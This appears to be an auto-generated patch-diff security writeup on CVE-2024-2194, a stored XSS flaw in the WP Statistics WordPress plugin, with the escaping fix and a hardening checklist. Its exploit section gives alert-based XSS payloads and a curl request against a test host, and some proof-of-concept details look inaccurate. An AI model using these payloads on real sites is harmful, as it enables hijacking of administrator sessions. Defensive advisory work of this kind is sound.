ANALYSIS · a5d8222a· FINISHED 2026-06-13 · PATCHDIFF

wp-statistics14.5 → 14.5.1✓ COMPLETED

Files6

Vulnerable3

True positives0

CVE matched1

1 CVE article ready PatchLeaks generated full security writeups for the matched CVEs · one per CVE, with affected files linked

CVE-2024-2194

FILTERS 0

SEARCH

STATUS

JUDGE

CVE MATCH

EXTENSION

CWE

OPTIONS

Hide “No vulnerability” Hide unjudged

SCOPE

All 6 CVE 1 Vuln 3

SORT

1 files · page 1/1

includes/class-wp-statistics-pages.php

AI: 1 vulnerabilities

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVE-2024-2194

#%!d(float64=002)

1–1 of 1

⌖

Select a file from the list to inspect its diff and AI analysis.

↑ ↓ to navigate

CVES 1

CVE-2024-2194

Security writeup for CVE-2024-2194

✓ 1 FILE

## The Exploit

An unauthenticated attacker can inject arbitrary JavaScript into WordPress admin pages by crafting a malicious URL that WP Statistics processes and reflects without proper escaping.

```http
GET /wp-admin/admin.php?page=wps_pages_menu&uri=<img%20src=x%20onerror=alert('XSS')> HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0
```

When a logged-in WordPress admin visits a page containing statistics data, the injected payload executes in their browser context. The attacker observes the JavaScript alert dialog fire, confirming code execution. The payload persists because WP Statistics stores the malicious URI string in its database and reflects it on subsequent page loads without escaping.

To demonstrate stored XSS, the attacker first poisons the statistics table by accessing a crafted URL:

```bash
curl -i "http://target.local/index.php?p=1" \
  -H "User-Agent: Mozilla/5.0" \
  -H "Referer: http://target.local/" \
  --data-raw "uri=<img%20src=x%20onerror=alert('Stored%20XSS%20executed')>"
```

The malicious URI is logged. On the second request, when an admin views the WP Statistics pages report:

```http
GET /wp-admin/admin.php?page=wps_pages_menu HTTP/1.1
Host: target.local
Cookie: wordpress_logged_in=<admin_session_token>
```

The stored payload renders unescaped in the page title or URL display field, triggering execution in the admin's session.

---

## What the Patch Did

**Before:**
```php
$list[] = array(
    'title'     => $page_info['title'],
    'link'      => $page_info['link'],
    'str_url'   => urldecode($item->uri),
    'hits_page' => Menus::admin_url('pages', array('ID' => $item->id, 'type' => $item->type)),
    'number'    => number_format_i18n($item->count_sum)
);
```

**After:**
```php
$list[] = array(
    'title'     => esc_html($page_info['title']),
    'link'      => $page_info['link'],
    'str_url'   => esc_url(urldecode($item->uri)),
    'hits_page' => Menus::admin_url('pages', array('ID' => $item->id, 'type' => $item->type)),
    'number'    => number_format_i18n($item->count_sum)
);
```

The patch adds two output-escaping functions from the WordPress API. The `esc_html()` call on the `title` field converts dangerous characters (`<`, `>`, `&`, `"`, `'`) into HTML entities, preventing any HTML or JavaScript interpretation when the title renders in a template. The `esc_url()` call on the `str_url` field validates the URI and escapes it for safe inclusion in HTML attributes or links, blocking `javascript:` protocol handlers and other dangerous URL schemes.

---

## Root Cause

**CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting).**

The vulnerability exists at the trust boundary between user-controlled request data and HTML output. When a WordPress site visitor accesses a URL with a crafted `uri` parameter (or when WP Statistics tracks a request containing a malicious Referer or User-Agent), that data enters the `$item->uri` database column unvalidated. When the plugin constructs the admin statistics page, it retrieves this stored URI from the database and assigns it directly to the `str_url` array element without escaping. The template then renders this array element into HTML without further sanitization, allowing the attacker's injected script to execute in any admin's browser that views the statistics page.

---

## Why It Works

The critical line is `esc_url(urldecode($item->uri))`. If you remove `esc_url()` but keep `urldecode()`, the bug remains exploitable: `urldecode()` only translates URL-encoded characters (e.g., `%20` → space) and does not prevent XSS. An attacker can still inject `<img src=x onerror=alert()>` unencoded in the URI parameter, and it renders as executable HTML.

The engineer added `esc_html()` to the title field as defence-in-depth, even though title data typically comes from page post metadata. This demonstrates layered escaping: assume that any data touching the template layer might be attacker-controlled, and escape it according to its output context (HTML text vs. URL). The combination ensures that even if an admin or configuration mistake allows untrusted data into the title field, the HTML escaping still prevents breakout.

---

## Hardening Checklist

- **Add output escaping at the template boundary:** Use context-appropriate WordPress escape functions (`esc_html()`, `esc_attr()`, `esc_url()`, `esc_js()`) on every variable rendered in HTML, regardless of its source. Do not assume database data is clean.

- **Implement `sanitize_text_field()` or `wp_kses_post()` on input ingestion:** When logging page visits via `$_SERVER['REQUEST_URI']` or Referer headers, sanitize these values immediately before database insertion to reduce stored XSS surface area.

- **Use nonces to protect admin forms:** Add `wp_verify_nonce()` checks to any admin page that processes user input, blocking CSRF attacks that could trick admins into triggering the XSS via malicious links.

- **Enable WordPress security headers in templates:** Implement a Content-Security-Policy that disallows inline scripts (`'unsafe-inline'` excluded), which would have blocked the `onerror=` handler even if escaping had been missing.

- **Audit template rendering for unescaped variables:** Run a static analysis tool such as PHPCS with the `WordPress.Security.EscapeOutput` standard on all template files to catch instances of `echo`, `print`, or variable interpolation without escape functions.

---

## References

- https://nvd.nist.gov/vuln/detail/CVE-2024-2194

CVE CVE-2024-2194

PRODUCT wp-statistics

AFFECTED ≤ 14.5

FIXED IN 14.5.1

STATUS Generated

Security writeup · CVE-2024-2194

Source files · 1

includes/class-wp-statistics-pages.php Linked

↗ NVD